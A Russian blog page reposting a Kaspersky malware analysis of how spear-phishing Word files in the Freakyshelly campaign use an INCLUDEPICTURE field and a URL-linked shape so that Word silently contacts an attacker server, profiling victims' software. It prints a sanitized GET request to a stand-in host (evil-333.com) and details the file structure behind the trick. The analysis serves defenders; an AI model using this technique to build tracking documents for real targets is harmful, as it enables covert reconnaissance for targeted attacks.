Главная
 
Блог Гадского ПапыСреда, 04.08.2021, 12:34



Приветствую Вас Приведение | RSS
Главная
Страницы в соцсетях

Поделиться

Разделы сайта

Обновления форума
  • Коронавирус... Дезинфекция.... (151)
  • Форумные тролли (6)
  • Танки (9)
  • Из мира НАТО (1)
  • Документы (26)
  • Хабар Пантеры (8)
  • Сталкеры и черти-что (58)
  • "Хибины" против "Иджис" (2)
  • Возвращение Шрама (30)
  • Спецмашины для ЧАЭС (29)

  • Категории раздела
    Чернобыльская Зона Отчуждения [471]
    О Припяти, про аварию на АЭС, про ликвидаторов аварии и про нелегалов сталкеров
    Мои сочинительства [6]
    Навеянное книгами и играми серии Сталкер
    Интересное [181]
    Не только о Чернобыльской Зоне Отчуждения
    Юмор [6]
    Сталкеры шутят
    Не в тему [34]
    Интересные случаи
    Как это было. Александр Наумов [5]
    Попытка написания сценария...
    Чернобыль глазами солдата [3]
    Мемуары
    Зарево над Припятью [12]
    Дмитрию Биленкину - писателю и другу - посвящаю. (Владимир Губарев) Людям, кто не в теме, оброс толстой "урбанистической" кожей и не понимает жизни в маленьком городке, думает, что мир "вращается вокруг него" и "это было давно и неправда" - читать ... рекомендуется
    Игровой мир [43]
    На тему игры Сталкер и не только....

    Наш опрос
    Хочу в Припять!
    Всего ответов: 124

    Статистика

    Онлайн всего: 5
    Гостей: 5
    Пользователей: 0

    Посоветовать друзьям

    Помощь
    Свой сайт или форум
    Свой блог или форум
    uCalc — универсальный конструктор калькуляторов и форм
    Домены, хостинг



    16:34
    (Не)документированная особенность Word, используемая злоумышленниками
    Некоторое время назад, в процессе исследования деятельности целевой атаки Freakyshelly, мы обнаружили spear-phishing рассылку писем с интересными вложенными документами. Это были файлы в формате OLE2, которые не содержали ни макросов, ни эксплойтов, ни какого-либо другого активного контента. Однако при детальном рассмотрении обнаружилось, что внутри них есть несколько ссылок на PHP-скрипты, расположенные на сторонних ресурсах.

    При попытке открыть эти файлы в Microsoft Word оказалось, что приложение обращается по одной из этих ссылок. В результате обращения злоумышленники получали информацию об установленном на компьютере ПО. 

    Зачем это плохим парням? Для успешной направленной атаки, необходимо сначала провести разведку — найти выходы на предполагаемых жертв и собрать информацию о них. Например, узнать версию операционной системы и некоторых приложений на компьютере жертвы, чтобы затем отправить соответствующий эксплойт.

    В нашем случае документ выглядел так: 
     

    На первый взгляд — ничего подозрительного, просто набор полезных советов на тему повышения эффективности при использовании поиска Google. В документе нет активного контента, нет VBA-макросов, вложенных Flash-объектов и PE-файлов. Но после того, как пользователь открывает документ, Word отсылает следующий GET-запрос по одной из внутренних ссылок. Мы взяли оригинальный документ, используемый в атаке, и заменили подозрительные ссылки на http://evil-*, вот что получилось: 

    GET http://evil-333.com/cccccccccccc/ccccccccc/ccccccccc.php?cccccccccc HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; MSOffice 12)
    Accept-Encoding: gzip, deflate
    Host: evil-333.com
    Proxy-Connection: Keep-Alive

    Таким образом к атакующим попадала информация об установленном на машине ПО, в том числе версия Microsoft Office. Мы решили разобраться, почему Office переходит по указанной ссылке и как можно такие ссылки находить в документах.

    Внутри документа Word

    Первое, что бросается в глаза при рассмотрении документа, – поле INCLUDEPICTURE с одной из подозрительных ссылок. Но, как можно заметить, по факту Word обращается не по ней. 
     
    На самом деле блок данных на картинке выше — первый и единственный кусок текста в этом документе. Текст в документах формата Word находится в потоке WordDocument в «сыром виде», т.е. без какого-либо форматирования, за исключением так называемых полей. Поля говорят Word, что определенная часть текста должна быть показана при открытии документа специальным образом, к примеру, благодаря им мы видим активные ссылки на другие страницы документа, URL и т.п.  Поле INCLUDEPICTURE сообщает о том, что к определённым символам в тексте привязана картинка. Байт 0x13 (помечен красным) перед этим полем сигнализирует, что тут кончается «сырой текст» и начинается описание поля. Формат описания примерно таков (согласно [MS-DOC]: Word (.doc) Binary File Format):

    Begin = 0x13
    Sep = 0x14
    End = 0x15
    Field = <Begin> *<Field> [Sep] *<Field> <End>

    Байт-разделитель 0x14 помечен желтым, а байт 0x15, говорящий об окончании поля, — розовым.

    Ссылка на картинку в INCLUDEPICTURE должна быть в кодировке ASCII, но в данном случае она в Unicode, и поэтому Word ссылку игнорирует. Но после разделителя 0x14 идет байт 0x01 (помечен зеленым), говорящий о том, что для этой картинки есть так называемый заполнитель (placeholder), который «сообщает» редактору, что в это место должно быть вставлено изображение.  Вопрос: как его найти?

    У символов и групп символов в тексте также имеются свойства, которые, как и поля, отвечают за форматирование (к примеру, они определяют, что какой-то кусок текста должен быть отображен курсивом). Свойства символов хранятся в двухуровневой таблице в потоках документа под названием xTable и Data. Не будем вдаваться в подробности разбора свойств символов – они имеют непростой формат, но в результате мы можем найти свойства символов со смещения 0x929 до 0x92C в потоке WordDocument: 
     
    Это как раз последовательность байт c picture placeholder’ом 0x14 0x01 0x15. В самом документе эти байты расположены по смещениям 0xB29 – 0xB2C, но поток WordDocument начинается со смещения 0x200, а смещения символов указаны относительно его начала.

    Свойства группы символов CP[2] указывают на то, что к ним привязана некая картинка, которая расположена в потоке Data по смещению 0:

    1FEF: prop[0]: 6A03 CPicLocation
    1FF1: value[0]: 00000000 ; character = 14

    Этот вывод сделан с учетом того, что в значении поля INCLUDEPICTURE указан байт 0x01, который говорит о том, что картинка должна располагаться в потоке Data по соответствующему смещению. Если бы этот значение было другим, то нужно было бы либо искать картинку в другом месте, либо проигнорировать это свойство.

    Как раз тут мы натолкнулись на недокументированное свойство. Описание поля INCLUDEPICTURE в документации MS фактически отсутствует, вот что там написано:

    0x43 INCLUDEPICTURE Specified in [ECMA-376] part 4, section 2.16.5.33.

    В стандарте ECMA-376 описана только часть INCLUDEPICTURE до байта-разделителя. Там нет ничего про то, что могут значить данные после него и как их интерпретировать. Это было основной проблемой в понимании того, что же все-таки происходит.

    Итак, переходим в поток Data по смещению 0, там расположена так называемая форма SHAPEFILE: 
     
    Формы описаны в другом документе Microsoft: [MS-ODRAW]: Office Drawing Binary File Format. У нее есть имя, в данном случае оно тоже представляет собой другую подозрительную ссылку: 
     
    Но поскольку это просто имя объекта, ссылка никак не используется. В процессе разбора этой формы посмотрим на поле флагов (обведено красным): 
     
    Значение 0x0000000E раскладывается в комбинацию трех флагов:
    msoblipflagURL 0x00000002
    msoblipflagDoNotSave 0x00000004
    msoblipflagLinkToFile 0x00000008
    Это говорит о том, что к форме должны прилагаться дополнительные данные (на рисунке они обведены желтым). И что эти данные представляют собой URL, по которому уже расположено фактическое содержимое формы. Также есть флаг, который препятствует тому чтобы при открытии документа это содержимое сохранилось в самом документе – do not save.

    Если посмотреть, что собой представляет этот URL, то мы обнаружим, что это та самая ссылка, по которой переходит Word при открытии документа: 
     
    Заметим, что кроме Word для Windows, эта «фича» присутствует в Microsoft Office для iOS и Android, а вот LibreOffice и OpenOffice ее не поддерживают: при открытии документа в этих офисных пакетах, обращения к ссылке не происходит.

    Вот такой сложный механизм был создан «плохими парнями» для проведения профилирования потенциальных жертв целевых атак. Т.е. они проводят серьезные глубокие исследования, чтобы осуществлять целевые атаки и оставаться незамеченными.

    Продукты «Лаборатории Касперского» умеют определять, что в документах используется описанная в статье техника, и находить ссылки, вставленные в документы посредством этой техники, чтобы затем их проверить. 

    Источник - securelist.ru
    Категория: Не в тему | Просмотров: 624 | Добавил: Гадский-Папа | Теги: OpenOffice, Word для Windows, Каспрский, лаборатория, LibreOffice, android, ворд, iOS | Рейтинг: 0.0/0

    Похожие материалы
    Всего комментариев: 1
    avatar
    1
    1
    Евгений Касперский объяснил случайностью  surprised  получение данных АНБ
    Основатель «Лаборатории Касперского» Евгений Касперский заявил АР, что антивирусная компания получила секретные файлы, которые имели отношение к Агентству национальной безопасности США, в рамках стандартной процедуры загрузки исследуемых вирусов с компьютеров пользователей. 

    Господин Касперский рассказал, что в 2014 году аналитики пришли к нему в офис и сообщили, что скачали данные о команде хакеров Equation Group. Они сказали, что среди них есть секретные документы АНБ. По словам основателя компании, он сказал им «немедленно удалить» информацию. При этом Евгений Касперский не ответил на вопрос, уведомляла ли «Лаборатория Касперского» АНБ о получении секретных документов.
    В сентябре американские спецслужбы заявили, что продукция «Лаборатории Касперского» представляет угрозу национальной безопасности США. Российские власти раскритиковали эту позицию. Тем не менее, глава лаборатории Евгений Касперский заявил, что компания не намерена уходить с американского рынка.
    avatar
    Вход на сайт
    Логин:
    Пароль:

    Поиск

    Календарь
    «  Сентябрь 2017  »
    ПнВтСрЧтПтСбВс
        123
    45678910
    11121314151617
    18192021222324
    252627282930

    Архив

    Облако меток

    Крайние Комментарии





    Ещё одно учения устр


    На основе анализа ст




    Подписка

    Enter your email address:

    Delivered by FeedBurner



    Top.Mail.Ru
    Блог Гадского Папы © 2021
    Используются технологии uCoz Яндекс.Метрика
    Приветствую тебя гость! Что-бы иметь более широкий доступ на сайте и скачивать файлы, советуем вам
    зарегистрироваться,
    или войти на сайт как пользователь это займет менее двух минут.Авторизация на сайте